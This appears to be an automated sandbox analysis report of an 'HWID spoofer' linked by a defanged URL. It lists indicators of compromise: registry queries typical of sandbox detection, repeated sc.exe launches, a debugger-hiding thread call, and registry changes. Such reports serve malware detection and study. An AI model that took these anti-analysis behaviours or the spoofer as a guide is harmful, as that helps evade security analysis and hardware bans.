hxxps://www[.]perfectmod[.]fun/hwid-spoofer

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	Volumeid64.exe
File opened (read-only)	\??\D:	Volumeid64.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	AMIDEWINx64.exe
File opened (read-only)	\??\F:	AMIDEWINx64.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe

Maps connected drives based on registry 3 TTPs 51 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count	AMIDEWINx64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	AMIDEWINx64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	Volumeid64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	Volumeid64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	AMIDEWINx64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count	Volumeid64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	Volumeid64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	AMIDEWINx64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count	DevManView.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2976	sync_spoofer.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe

Launches sc.exe 26 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5236	sc.exe
5188	sc.exe
240	sc.exe
6084	sc.exe
7020	sc.exe
3080	sc.exe
6452	sc.exe
1108	sc.exe
1456	sc.exe
6456	sc.exe
4864	sc.exe
304	sc.exe
2688	sc.exe
6876	sc.exe
4796	sc.exe
5780	sc.exe
6944	sc.exe
5536	sc.exe
5692	sc.exe
6672	sc.exe
6456	sc.exe
4760	sc.exe
4652	sc.exe
6728	sc.exe
5784	sc.exe
7108	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGUID	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LocationInformation	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK	Volumeid64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067\	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Driver	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM	Volumeid64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters	Volumeid64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Control	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ContainerID	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LocationInformation	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ContainerID	AMIDEWINx64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AMIDEWINx64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Device Parameters	AMIDEWINx64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000	Volumeid64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Driver	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000064\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGuid	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ContainerID	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066	AMIDEWINx64.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\Total	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ad4ca76dbc56da01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com\Total = "589"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DOMStorage\bing.com\Total = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\www.bing.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\DomStorageState\EdpState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\002\Internet Explorer\EdpDomStorage\www.bing.com\ = "0"	MicrosoftEdgeCP.exe
